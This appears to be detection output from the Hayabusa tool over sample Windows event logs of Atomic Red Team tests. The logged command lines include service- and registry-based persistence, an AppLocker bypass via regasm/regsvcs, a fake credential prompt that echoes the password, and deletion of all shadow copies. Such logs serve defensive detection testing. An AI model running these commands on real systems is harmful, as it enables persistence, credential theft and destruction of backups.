+2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  start AtomicTestService  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  stop AtomicTestService  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  delete AtomicTestService  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d  C:\Path\AtomicRedTeam.dll  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP""  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe  /U T1121.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP""  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe  -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe  import c:\AtomicRedTeam\atomics\T1103\T1103.reg  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
